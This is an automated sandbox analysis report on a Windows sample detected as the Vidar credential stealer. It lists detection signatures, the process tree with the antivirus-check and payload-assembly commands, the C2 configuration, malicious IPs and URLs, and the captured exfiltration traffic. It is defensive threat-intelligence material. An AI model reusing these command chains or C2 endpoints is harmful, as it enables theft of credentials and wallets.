Joe Sandbox Cloud Basic Analysis Report

Loading Joe Sandbox Report ...

Edit tour

Windows Analysis Report
file.exe

Overview

General Information

Sample name:file.exe
Analysis ID:1483190
MD5:569720e2c07b1d34bac1366bf2b1c97a
SHA1:d0c7109e04b413f735bf034ce2cb2f8ee9daa837
SHA256:0df79273aea792b72c2218a616b36324e31aaf7da59271969a23a0c392f58451
Tags:exe
Infos:

Detection

Vidar
Score:100
Range:0 - 100
Whitelisted:false
Confidence:100%

Signatures

Antivirus detection for URL or domain
Found malware configuration
Sigma detected: Search for Antivirus process
Yara detected Powershell download and execute
Yara detected Vidar
Yara detected Vidar stealer
AI detected suspicious sample
C2 URLs / IPs found in malware configuration
Drops PE files with a suspicious file extension
Found API chain indicative of sandbox detection
Found many strings related to Crypto-Wallets (likely being stolen)
Found stalling execution ending in API Sleep call
Tries to harvest and steal browser information (history, passwords, etc)
Tries to harvest and steal ftp login credentials
Tries to steal Crypto Currency Wallets
AV process strings found (often used to terminate AV products)
Checks if Antivirus/Antispyware/Firewall program is installed (via WMI)
Contains functionality for read data from the clipboard
Contains functionality to block mouse and keyboard input (often used to hinder debugging)
Contains functionality to check if a debugger is running (IsDebuggerPresent)
Contains functionality to check if a window is minimized (may be used to check if an application is visible)
Contains functionality to communicate with device drivers
Contains functionality to dynamically determine API calls
Contains functionality to execute programs as a different user
Contains functionality to launch a process as a different user
Contains functionality to launch a program with higher privileges
Contains functionality to modify clipboard data
Contains functionality to open a port and listen for incoming connection (possibly a backdoor)
Contains functionality to query CPU information (cpuid)
Contains functionality to read the PEB
Contains functionality to read the clipboard data
Contains functionality to retrieve information about pressed keystrokes
Contains functionality to shutdown / reboot the system
Contains functionality to simulate keystroke presses
Contains functionality to simulate mouse events
Contains functionality which may be used to detect a debugger (GetProcessHeap)
Creates a process in suspended mode (likely to inject code)
Creates files inside the system directory
Detected potential crypto function
Drops PE files
Drops PE files to the application program directory (C:\ProgramData)
Enables debug privileges
Found dropped PE file which has not been started or loaded
Found large amount of non-executed APIs
Found potential string decryption / allocating functions
HTTP GET or POST without a user agent
IP address seen in connection with other malware
Internet Provider seen in connection with other malware
JA3 SSL client fingerprint seen in connection with other malware
May sleep (evasive loops) to hinder dynamic analysis
Monitors certain registry keys / values for changes (often done to protect autostart functionality)
OS version to string mapping found (often used in BOTs)
PE / OLE file has an invalid certificate
PE file contains sections with non-standard names
Potential key logger detected (key state polling based)
Queries the volume information (name, serial number etc) of a device
Sample execution stops while process was sleeping (likely an evasion)
Sample file is different than original file name gathered from version info
Sigma detected: Execution of Suspicious File Type Extension
Uses 32bit PE files
Uses a known web browser user agent for HTTP communication
Uses code obfuscation techniques (call, push, ret)
Yara detected Credential Stealer

Classification

Process Tree

  • System is w10x64
  • file.exe (PID: 5440 cmdline: "C:\Users\user\Desktop\file.exe" MD5: 569720E2C07B1D34BAC1366BF2B1C97A)
    • cmd.exe (PID: 2020 cmdline: "C:\Windows\System32\cmd.exe" /k move Ruth Ruth.cmd & Ruth.cmd & exit MD5: D0FCE3AFA6AA1D58CE9FA336CC2B675B)
      • conhost.exe (PID: 2180 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
      • tasklist.exe (PID: 6192 cmdline: tasklist MD5: 0A4448B31CE7F83CB7691A2657F330F1)
      • findstr.exe (PID: 5428 cmdline: findstr /I "wrsa.exe opssvc.exe" MD5: F1D4BE0E99EC734376FDE474A8D4EA3E)
      • tasklist.exe (PID: 3148 cmdline: tasklist MD5: 0A4448B31CE7F83CB7691A2657F330F1)
      • findstr.exe (PID: 2796 cmdline: findstr /I "avastui.exe avgui.exe ekrn.exe bdservicehost.exe nswscsvc.exe sophoshealth.exe" MD5: F1D4BE0E99EC734376FDE474A8D4EA3E)
      • cmd.exe (PID: 4052 cmdline: cmd /c md 447331 MD5: D0FCE3AFA6AA1D58CE9FA336CC2B675B)
      • findstr.exe (PID: 4408 cmdline: findstr /V "typesfaxincreasecompound" Ensemble MD5: F1D4BE0E99EC734376FDE474A8D4EA3E)
      • cmd.exe (PID: 3288 cmdline: cmd /c copy /b Compile + Olive + Within + Psychiatry 447331\p MD5: D0FCE3AFA6AA1D58CE9FA336CC2B675B)
      • Buyer.pif (PID: 2380 cmdline: Buyer.pif p MD5: 848164D084384C49937F99D5B894253E)
        • cmd.exe (PID: 4052 cmdline: "C:\Windows\system32\cmd.exe" /c timeout /t 10 & rd /s /q "C:\ProgramData\DBFHDHJKKJDH" & exit MD5: D0FCE3AFA6AA1D58CE9FA336CC2B675B)
          • conhost.exe (PID: 3872 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
          • timeout.exe (PID: 6180 cmdline: timeout /t 10 MD5: 976566BEEFCCA4A159ECBDB2D4B1A3E3)
      • choice.exe (PID: 4672 cmdline: choice /d y /t 5 MD5: FCE0E41C87DC4ABBE976998AD26C27E4)
  • cleanup

Malware Threat Intel

Provided by

NameDescriptionAttributionBlogpost URLsLink
VidarVidar is a forked malware based on Arkei. It seems this stealer is one of the first that is grabbing information on 2FA Software and Tor Browser.No Attributionhttps://malpedia.caad.fkie.fraunhofer.de/details/win.vidar

Malware Configuration

Threatname: Vidar

{"C2 url": ["https://steamcommunity.com/profiles/76561199747278259"], "Botnet": "1a72eb06939ea478753d5c4df4b2bd32"}

Yara Signatures

PCAP (Network Traffic)

SourceRuleDescriptionAuthorStrings
sslproxydump.pcapJoeSecurity_Vidar_2Yara detected VidarJoe Security

    Memory Dumps

    SourceRuleDescriptionAuthorStrings
    0000000B.00000003.2130645867.0000000003C4B000.00000004.00000800.00020000.00000000.sdmpJoeSecurity_Vidar_1Yara detected Vidar stealerJoe Security
      0000000B.00000002.2536816271.0000000001347000.00000004.00000020.00020000.00000000.sdmpJoeSecurity_Vidar_1Yara detected Vidar stealerJoe Security
        0000000B.00000002.2537199925.0000000003A7A000.00000004.00000800.00020000.00000000.sdmpJoeSecurity_Vidar_1Yara detected Vidar stealerJoe Security
          0000000B.00000002.2536907553.00000000013D9000.00000004.00000020.00020000.00000000.sdmpJoeSecurity_Vidar_1Yara detected Vidar stealerJoe Security
            0000000B.00000003.2130822576.00000000040FC000.00000004.00000800.00020000.00000000.sdmpJoeSecurity_Vidar_1Yara detected Vidar stealerJoe Security
              Click to see the 5 entries

              Unpacked PEs

              SourceRuleDescriptionAuthorStrings
              11.2.Buyer.pif.1354718.1.raw.unpackJoeSecurity_Vidar_1Yara detected Vidar stealerJoe Security
                11.2.Buyer.pif.1354718.1.unpackJoeSecurity_Vidar_1Yara detected Vidar stealerJoe Security
                  11.2.Buyer.pif.40f0000.6.unpackJoeSecurity_Vidar_1Yara detected Vidar stealerJoe Security

                    Sigma Signatures

                    Sigma detected: Execution of Suspicious File Type Extension
                    Source: Process startedAuthor: Max Altgelt (Nextron Systems): Data: Command: Buyer.pif p, CommandLine: Buyer.pif p, CommandLine|base64offset|contains: , Image: C:\Users\user\AppData\Local\Temp\447331\Buyer.pif, NewProcessName: C:\Users\user\AppData\Local\Temp\447331\Buyer.pif, OriginalFileName: C:\Users\user\AppData\Local\Temp\447331\Buyer.pif, ParentCommandLine: "C:\Windows\System32\cmd.exe" /k move Ruth Ruth.cmd & Ruth.cmd & exit, ParentImage: C:\Windows\SysWOW64\cmd.exe, ParentProcessId: 2020, ParentProcessName: cmd.exe, ProcessCommandLine: Buyer.pif p, ProcessId: 2380, ProcessName: Buyer.pif

                    HIPS / PFW / Operating System Protection Evasion

                    barindex
                    Sigma detected: Search for Antivirus process
                    Source: Process startedAuthor: Joe Security: Data: Command: findstr /I "avastui.exe avgui.exe ekrn.exe bdservicehost.exe nswscsvc.exe sophoshealth.exe" , CommandLine: findstr /I "avastui.exe avgui.exe ekrn.exe bdservicehost.exe nswscsvc.exe sophoshealth.exe" , CommandLine|base64offset|contains: ~), Image: C:\Windows\SysWOW64\findstr.exe, NewProcessName: C:\Windows\SysWOW64\findstr.exe, OriginalFileName: C:\Windows\SysWOW64\findstr.exe, ParentCommandLine: "C:\Windows\System32\cmd.exe" /k move Ruth Ruth.cmd & Ruth.cmd & exit, ParentImage: C:\Windows\SysWOW64\cmd.exe, ParentProcessId: 2020, ParentProcessName: cmd.exe, ProcessCommandLine: findstr /I "avastui.exe avgui.exe ekrn.exe bdservicehost.exe nswscsvc.exe sophoshealth.exe" , ProcessId: 2796, ProcessName: findstr.exe

                    Snort Signatures

                    No Snort rule has matched

                    Suricata Signatures

                    Timestamp:2024-07-26T19:58:18.595071+0200
                    SID:2051831
                    Source Port:443
                    Destination Port:49715
                    Protocol:TCP
                    Classtype:Malware Command and Control Activity Detected
                    Timestamp:2024-07-26T19:58:48.364414+0200
                    SID:2028765
                    Source Port:49733
                    Destination Port:443
                    Protocol:TCP
                    Classtype:Unknown Traffic
                    Timestamp:2024-07-26T19:58:17.933745+0200
                    SID:2028765
                    Source Port:49715
                    Destination Port:443
                    Protocol:TCP
                    Classtype:Unknown Traffic
                    Timestamp:2024-07-26T19:58:40.259772+0200
                    SID:2028765
                    Source Port:49728
                    Destination Port:443
                    Protocol:TCP
                    Classtype:Unknown Traffic
                    Timestamp:2024-07-26T19:58:28.934319+0200
                    SID:2028765
                    Source Port:49722
                    Destination Port:443
                    Protocol:TCP
                    Classtype:Unknown Traffic
                    Timestamp:2024-07-26T19:58:16.599098+0200
                    SID:2028765
                    Source Port:49714
                    Destination Port:443
                    Protocol:TCP
                    Classtype:Unknown Traffic
                    Timestamp:2024-07-26T19:58:25.836622+0200
                    SID:2028765
                    Source Port:49720
                    Destination Port:443
                    Protocol:TCP
                    Classtype:Unknown Traffic
                    Timestamp:2024-07-26T19:58:34.371651+0200
                    SID:2028765
                    Source Port:49725
                    Destination Port:443
                    Protocol:TCP
                    Classtype:Unknown Traffic
                    Timestamp:2024-07-26T19:58:47.016652+0200
                    SID:2028765
                    Source Port:49732
                    Destination Port:443
                    Protocol:TCP
                    Classtype:Unknown Traffic
                    Timestamp:2024-07-26T19:58:29.673364+0200
                    SID:2011803
                    Source Port:443
                    Destination Port:49722
                    Protocol:TCP
                    Classtype:Executable code was detected
                    Timestamp:2024-07-26T19:58:42.938290+0200
                    SID:2028765
                    Source Port:49730
                    Destination Port:443
                    Protocol:TCP
                    Classtype:Unknown Traffic
                    Timestamp:2024-07-26T19:58:41.583181+0200
                    SID:2028765
                    Source Port:49729
                    Destination Port:443
                    Protocol:TCP
                    Classtype:Unknown Traffic
                    Timestamp:2024-07-26T19:58:39.089459+0200
                    SID:2028765
                    Source Port:49727
                    Destination Port:443
                    Protocol:TCP
                    Classtype:Unknown Traffic
                    Timestamp:2024-07-26T19:58:49.953417+0200
                    SID:2054495
                    Source Port:49734
                    Destination Port:80
                    Protocol:TCP
                    Classtype:A Network Trojan was detected
                    Timestamp:2024-07-26T19:58:27.179495+0200
                    SID:2028765
                    Source Port:49721
                    Destination Port:443
                    Protocol:TCP
                    Classtype:Unknown Traffic
                    Timestamp:2024-07-26T19:58:30.758808+0200
                    SID:2028765
                    Source Port:49723
                    Destination Port:443
                    Protocol:TCP
                    Classtype:Unknown Traffic
                    Timestamp:2024-07-26T19:58:23.676169+0200
                    SID:2028765
                    Source Port:49718
                    Destination Port:443
                    Protocol:TCP
                    Classtype:Unknown Traffic
                    Timestamp:2024-07-26T19:58:15.923488+0200
                    SID:2049087
                    Source Port:49711
                    Destination Port:443
                    Protocol:TCP
                    Classtype:A Network Trojan was detected
                    Timestamp:2024-07-26T19:58:19.322610+0200
                    SID:2028765
                    Source Port:49716
                    Destination Port:443
                    Protocol:TCP
                    Classtype:Unknown Traffic
                    Timestamp:2024-07-26T19:58:17.256726+0200
                    SID:2044247
                    Source Port:443
                    Destination Port:49714
                    Protocol:TCP
                    Classtype:Malware Command and Control Activity Detected
                    Timestamp:2024-07-26T19:58:22.600438+0200
                    SID:2011803
                    Source Port:443
                    Destination Port:49717
                    Protocol:TCP
                    Classtype:Executable code was detected
                    Timestamp:2024-07-26T19:58:15.159939+0200
                    SID:2028765
                    Source Port:49711
                    Destination Port:443
                    Protocol:TCP
                    Classtype:Unknown Traffic
                    Timestamp:2024-07-26T19:58:45.001633+0200
                    SID:2028765
                    Source Port:49731
                    Destination Port:443
                    Protocol:TCP
                    Classtype:Unknown Traffic
                    Timestamp:2024-07-26T19:58:13.854105+0200
                    SID:2028765
                    Source Port:49707
                    Destination Port:443
                    Protocol:TCP
                    Classtype:Unknown Traffic
                    Timestamp:2024-07-26T19:58:12.758336+0200
                    SID:2028765
                    Source Port:49705
                    Destination Port:443
                    Protocol:TCP
                    Classtype:Unknown Traffic
                    Timestamp:2024-07-26T19:58:20.614117+0200
                    SID:2028765
                    Source Port:49717
                    Destination Port:443
                    Protocol:TCP
                    Classtype:Unknown Traffic
                    Timestamp:2024-07-26T19:58:35.938833+0200
                    SID:2028765
                    Source Port:49726
                    Destination Port:443
                    Protocol:TCP
                    Classtype:Unknown Traffic
                    Timestamp:2024-07-26T19:58:32.652835+0200
                    SID:2028765
                    Source Port:49724
                    Destination Port:443
                    Protocol:TCP
                    Classtype:Unknown Traffic
                    Timestamp:2024-07-26T19:58:52.838130+0200
                    SID:2022930
                    Source Port:443
                    Destination Port:49735
                    Protocol:TCP
                    Classtype:A Network Trojan was detected
                    Timestamp:2024-07-26T19:58:14.504211+0200
                    SID:2022930
                    Source Port:443
                    Destination Port:49706
                    Protocol:TCP
                    Classtype:A Network Trojan was detected
                    Timestamp:2024-07-26T19:58:24.742835+0200
                    SID:2028765
                    Source Port:49719
                    Destination Port:443
                    Protocol:TCP
                    Classtype:Unknown Traffic

                    Joe Sandbox Signatures

                    Click to jump to signature section

                    Show All Signature Results

                    AV Detection

                    barindex
                    Antivirus detection for URL or domain
                    Source: https://5.75.212.60/sqls.dllAvira URL Cloud: Label: malware
                    Source: https://steamcommunity.com/profiles/76561199747278259/badgesAvira URL Cloud: Label: malware
                    Source: https://t.me/armad2aAvira URL Cloud: Label: malware
                    Source: https://5.75.212.60/softokn3.dlliAvira URL Cloud: Label: malware
                    Source: https://5.75.212.60/HAvira URL Cloud: Label: malware
                    Source: https://steamcommunity.com/profiles/76561199747278259Avira URL Cloud: Label: malware
                    Source: https://5.75.212.60/softokn3.dllAvira URL Cloud: Label: malware
                    Source: https://5.75.212.60/mozglue.dllAvira URL Cloud: Label: malware
                    Source: https://steamcommunity.com/profiles/76561199747278259/inventory/Avira URL Cloud: Label: malware
                    Source: https://5.75.212.60/Avira URL Cloud: Label: malware
                    Source: https://5.75.212.60/nss3.dllAvira URL Cloud: Label: malware
                    Source: https://5.75.212.60/freebl3.dllAvira URL Cloud: Label: malware
                    Source: https://5.75.212.60/msvcp140.dllAvira URL Cloud: Label: malware
                    Source: https://5.75.212.60/nss3.dll=Avira URL Cloud: Label: malware
                    Found malware configuration
                    Source: 0000000B.00000002.2536816271.0000000001347000.00000004.00000020.00020000.00000000.sdmpMalware Configuration Extractor: Vidar {"C2 url": ["https://steamcommunity.com/profiles/76561199747278259"], "Botnet": "1a72eb06939ea478753d5c4df4b2bd32"}
                    AI detected suspicious sample
                    Source: Submited SampleIntegrated Neural Analysis Model: Matched 98.8% probability
                    Source: file.exeStatic PE information: EXECUTABLE_IMAGE, 32BIT_MACHINE
                    Source: unknownHTTPS traffic detected: 23.192.247.89:443 -> 192.168.2.5:49704 version: TLS 1.2
                    Source: unknownHTTPS traffic detected: 5.75.212.60:443 -> 192.168.2.5:49705 version: TLS 1.2
                    Source: file.exeStatic PE information: DYNAMIC_BASE, NX_COMPAT, NO_SEH, TERMINAL_SERVER_AWARE
                    Source: Binary string: freebl3.pdb source: Buyer.pif, 0000000B.00000002.2545100518.000000001386F000.00000004.00000800.00020000.00000000.sdmp, freebl3.dll.11.dr
                    Source: Binary string: mozglue.pdbP source: Buyer.pif, 0000000B.00000002.2547386576.00000000197D0000.00000004.00000800.00020000.00000000.sdmp, Buyer.pif, 0000000B.00000002.2561231245.000000006C44D000.00000002.00000001.01000000.00000009.sdmp, mozglue.dll.11.dr
                    Source: Binary string: freebl3.pdbp source: Buyer.pif, 0000000B.00000002.2545100518.000000001386F000.00000004.00000800.00020000.00000000.sdmp, freebl3.dll.11.dr
                    Source: Binary string: nss3.pdb@ source: Buyer.pif, 0000000B.00000002.2561551186.000000006C60F000.00000002.00000001.01000000.00000008.sdmp, Buyer.pif, 0000000B.00000002.2556171611.000000003158B000.00000004.00000800.00020000.00000000.sdmp, nss3.dll.11.dr
                    Source: Binary string: softokn3.pdb@ source: Buyer.pif, 0000000B.00000002.2551950286.00000000256A1000.00000004.00000800.00020000.00000000.sdmp, softokn3.dll.11.dr
                    Source: Binary string: d:\agent\_work\1\s\binaries\x86ret\bin\i386\\vcruntime140.i386.pdb source: Buyer.pif, 0000000B.00000002.2554138012.000000002B617000.00000004.00000800.00020000.00000000.sdmp, vcruntime140.dll.11.dr
                    Source: Binary string: d:\agent\_work\1\s\binaries\x86ret\bin\i386\\msvcp140.i386.pdb source: Buyer.pif, 0000000B.00000002.2549888344.000000001F737000.00000004.00000800.00020000.00000000.sdmp, msvcp140.dll.11.dr
                    Source: Binary string: nss3.pdb source: Buyer.pif, 0000000B.00000002.2561551186.000000006C60F000.00000002.00000001.01000000.00000008.sdmp, Buyer.pif, 0000000B.00000002.2556171611.000000003158B000.00000004.00000800.00020000.00000000.sdmp, nss3.dll.11.dr
                    Source: Binary string: C:\Users\Dan\Desktop\work\sqlite\tmp\sqlite_bld_dir\2\sqlite3.pdb source: Buyer.pif, 0000000B.00000002.2541666136.000000000C8B8000.00000002.00001000.00020000.00000000.sdmp, Buyer.pif, 0000000B.00000002.2541984442.000000000CCF8000.00000004.00000800.00020000.00000000.sdmp
                    Source: Binary string: mozglue.pdb source: Buyer.pif, 0000000B.00000002.2547386576.00000000197D0000.00000004.00000800.00020000.00000000.sdmp, Buyer.pif, 0000000B.00000002.2561231245.000000006C44D000.00000002.00000001.01000000.00000009.sdmp, mozglue.dll.11.dr
                    Source: Binary string: softokn3.pdb source: Buyer.pif, 0000000B.00000002.2551950286.00000000256A1000.00000004.00000800.00020000.00000000.sdmp, softokn3.dll.11.dr
                    Source: C:\Users\user\Desktop\file.exeCode function: 0_2_004062D5 FindFirstFileW,FindClose,0_2_004062D5
                    Source: C:\Users\user\Desktop\file.exeCode function: 0_2_00402E18 FindFirstFileW,0_2_00402E18
                    Source: C:\Users\user\Desktop\file.exeCode function: 0_2_00406C9B DeleteFileW,lstrcatW,lstrcatW,lstrcatW,lstrlenW,FindFirstFileW,DeleteFileW,FindNextFileW,FindClose,RemoveDirectoryW,0_2_00406C9B
                    Source: C:\Users\user\AppData\Local\Temp\447331\Buyer.pifCode function: 11_2_00FAE1AC GetFileAttributesW,FindFirstFileW,FindClose,11_2_00FAE1AC
                    Source: C:\Users\user\AppData\Local\Temp\447331\Buyer.pifCode function: 11_2_00FAD98E FindFirstFileW,DeleteFileW,FindNextFileW,FindClose,FindClose,11_2_00FAD98E
                    Source: C:\Users\user\AppData\Local\Temp\447331\Buyer.pifCode function: 11_2_00FBA29A FindFirstFileW,Sleep,FindNextFileW,FindClose,11_2_00FBA29A
                    Source: C:\Users\user\AppData\Local\Temp\447331\Buyer.pifCode function: 11_2_00FB6406 FindFirstFileW,FindNextFileW,FindClose,11_2_00FB6406
                    Source: C:\Users\user\AppData\Local\Temp\447331\Buyer.pifCode function: 11_2_00F7C5F3 FindFirstFileExW,11_2_00F7C5F3
                    Source: C:\Users\user\AppData\Local\Temp\447331\Buyer.pifCode function: 11_2_00FB70FE FindFirstFileW,FindClose,FileTimeToLocalFileTime,FileTimeToLocalFileTime,FileTimeToLocalFileTime,FileTimeToSystemTime,FileTimeToSystemTime,FileTimeToSystemTime,11_2_00FB70FE
                    Source: C:\Users\user\AppData\Local\Temp\447331\Buyer.pifCode function: 11_2_00FB705D FindFirstFileW,FindClose,11_2_00FB705D
                    Source: C:\Users\user\AppData\Local\Temp\447331\Buyer.pifCode function: 11_2_00FAD65B FindFirstFileW,DeleteFileW,DeleteFileW,MoveFileW,DeleteFileW,FindNextFileW,FindClose,FindClose,11_2_00FAD65B
                    Source: C:\Users\user\AppData\Local\Temp\447331\Buyer.pifCode function: 11_2_00FB9DB1 SetCurrentDirectoryW,FindFirstFileW,FindFirstFileW,GetFileAttributesW,SetFileAttributesW,FindNextFileW,FindClose,FindFirstFileW,SetCurrentDirectoryW,SetCurrentDirectoryW,SetCurrentDirectoryW,FindNextFileW,FindClose,FindClose,11_2_00FB9DB1
                    Source: C:\Users\user\AppData\Local\Temp\447331\Buyer.pifCode function: 11_2_00FB9F0C SetCurrentDirectoryW,FindFirstFileW,FindFirstFileW,FindNextFileW,FindClose,FindFirstFileW,SetCurrentDirectoryW,SetCurrentDirectoryW,SetCurrentDirectoryW,FindNextFileW,FindClose,FindClose,11_2_00FB9F0C
                    Source: C:\Windows\SysWOW64\cmd.exeFile opened: C:\Users\user\AppData\Local\Jump to behavior
                    Source: C:\Windows\SysWOW64\cmd.exeFile opened: C:\Users\user\AppData\Local\Temp\447331Jump to behavior
                    Source: C:\Windows\SysWOW64\cmd.exeFile opened: C:\Users\user\AppData\Jump to behavior
                    Source: C:\Windows\SysWOW64\cmd.exeFile opened: C:\Users\user\Jump to behavior
                    Source: C:\Windows\SysWOW64\cmd.exeFile opened: C:\Users\user\AppData\Local\Temp\447331\Jump to behavior
                    Source: C:\Windows\SysWOW64\cmd.exeFile opened: C:\Users\user\AppData\Local\Temp\Jump to behavior

                    Networking

                    barindex
                    C2 URLs / IPs found in malware configuration
                    Source: Malware configuration extractorURLs: https://steamcommunity.com/profiles/76561199747278259
                    Source: global trafficHTTP traffic detected: GET /profiles/76561199747278259 HTTP/1.1Host: steamcommunity.comConnection: Keep-AliveCache-Control: no-cache
                    Source: Joe Sandbox ViewIP Address: 77.91.101.71 77.91.101.71
                    Source: Joe Sandbox ViewIP Address: 5.75.212.60 5.75.212.60
                    Source: Joe Sandbox ViewIP Address: 23.192.247.89 23.192.247.89
                    Source: Joe Sandbox ViewASN Name: AKAMAI-ASUS AKAMAI-ASUS
                    Source: Joe Sandbox ViewJA3 fingerprint: 51c64c77e60f3980eea90869b68c58a8
                    Source: Joe Sandbox ViewJA3 fingerprint: 37f463bf4616ecd445d4a1937da06e19
                    Source: global trafficHTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/124.0.0.0 YaBrowser/24.6.0.1 Safari/537.36Host: 5.75.212.60Connection: Keep-AliveCache-Control: no-cache
                    Source: global trafficHTTP traffic detected: POST / HTTP/1.1Content-Type: multipart/form-data; boundary=----HJKJKKKJJJKJKFHJJJJEUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/124.0.0.0 YaBrowser/24.6.0.1 Safari/537.36Host: 5.75.212.60Content-Length: 279Connection: Keep-AliveCache-Control: no-cache
                    Source: global trafficHTTP traffic detected: POST / HTTP/1.1Content-Type: multipart/form-data; boundary=----JJJJDAAECGHDGDGCGHDBUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/124.0.0.0 YaBrowser/24.6.0.1 Safari/537.36Host: 5.75.212.60Content-Length: 331Connection: Keep-AliveCache-Control: no-cache
                    Source: global trafficHTTP traffic detected: POST / HTTP/1.1Content-Type: multipart/form-data; boundary=----GIJJKKJJDAAAAAKFHJJDUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/124.0.0.0 YaBrowser/24.6.0.1 Safari/537.36Host: 5.75.212.60Content-Length: 331Connection: Keep-AliveCache-Control: no-cache
                    Source: global trafficHTTP traffic detected: POST / HTTP/1.1Content-Type: multipart/form-data; boundary=----IIJDBGDGCGDAKFIDGIDBUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/124.0.0.0 YaBrowser/24.6.0.1 Safari/537.36Host: 5.75.212.60Content-Length: 332Connection: Keep-AliveCache-Control: no-cache
                    Source: global trafficHTTP traffic detected: POST / HTTP/1.1Content-Type: multipart/form-data; boundary=----FHIECBAFBFHIJKFIJDAKUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/124.0.0.0 YaBrowser/24.6.0.1 Safari/537.36Host: 5.75.212.60Content-Length: 6129Connection: Keep-AliveCache-Control: no-cache
                    Source: global trafficHTTP traffic detected: GET /sqls.dll HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/124.0.0.0 YaBrowser/24.6.0.1 Safari/537.36Host: 5.75.212.60Connection: Keep-AliveCache-Control: no-cache
                    Source: global trafficHTTP traffic detected: POST / HTTP/1.1Content-Type: multipart/form-data; boundary=----JKJDAEBFCBKECBGDBFCFUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/124.0.0.0 YaBrowser/24.6.0.1 Safari/537.36Host: 5.75.212.60Content-Length: 829Connection: Keep-AliveCache-Control: no-cache
                    Source: global trafficHTTP traffic detected: POST / HTTP/1.1Content-Type: multipart/form-data; boundary=----BKJKJEHJJDAKECBFCGIDUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/124.0.0.0 YaBrowser/24.6.0.1 Safari/537.36Host: 5.75.212.60Content-Length: 437Connection: Keep-AliveCache-Control: no-cache
                    Source: global trafficHTTP traffic detected: POST / HTTP/1.1Content-Type: multipart/form-data; boundary=----DHJEBGIEBFIJKEBFBFHIUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/124.0.0.0 YaBrowser/24.6.0.1 Safari/537.36Host: 5.75.212.60Content-Length: 437Connection: Keep-AliveCache-Control: no-cache
                    Source: global trafficHTTP traffic detected: GET /freebl3.dll HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/124.0.0.0 YaBrowser/24.6.0.1 Safari/537.36Host: 5.75.212.60Connection: Keep-AliveCache-Control: no-cache
                    Source: global trafficHTTP traffic detected: GET /mozglue.dll HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/124.0.0.0 YaBrowser/24.6.0.1 Safari/537.36Host: 5.75.212.60Connection: Keep-AliveCache-Control: no-cache
                    Source: global trafficHTTP traffic detected: GET /msvcp140.dll HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/124.0.0.0 YaBrowser/24.6.0.1 Safari/537.36Host: 5.75.212.60Connection: Keep-AliveCache-Control: no-cache
                    Source: global trafficHTTP traffic detected: GET /softokn3.dll HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/124.0.0.0 YaBrowser/24.6.0.1 Safari/537.36Host: 5.75.212.60Connection: Keep-AliveCache-Control: no-cache
                    Source: global trafficHTTP traffic detected: GET /vcruntime140.dll HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/124.0.0.0 YaBrowser/24.6.0.1 Safari/537.36Host: 5.75.212.60Connection: Keep-AliveCache-Control: no-cache
                    Source: global trafficHTTP traffic detected: GET /nss3.dll HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/124.0.0.0 YaBrowser/24.6.0.1 Safari/537.36Host: 5.75.212.60Connection: Keep-AliveCache-Control: no-cache
                    Source: global trafficHTTP traffic detected: POST / HTTP/1.1Content-Type: multipart/form-data; boundary=----FIIECFHDBAAECAAKFHDHUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/124.0.0.0 YaBrowser/24.6.0.1 Safari/537.36Host: 5.75.212.60Content-Length: 1145Connection: Keep-AliveCache-Control: no-cache
                    Source: global trafficHTTP traffic detected: POST / HTTP/1.1Content-Type: multipart/form-data; boundary=----IIEHCFIDHIDGIDHJEHIDUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/124.0.0.0 YaBrowser/24.6.0.1 Safari/537.36Host: 5.75.212.60Content-Length: 331Connection: Keep-AliveCache-Control: no-cache
                    Source: global trafficHTTP traffic detected: POST / HTTP/1.1Content-Type: multipart/form-data; boundary=----BKEHDGDGHCBGCAKFIIIEUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/124.0.0.0 YaBrowser/24.6.0.1 Safari/537.36Host: 5.75.212.60Content-Length: 331Connection: Keep-AliveCache-Control: no-cache
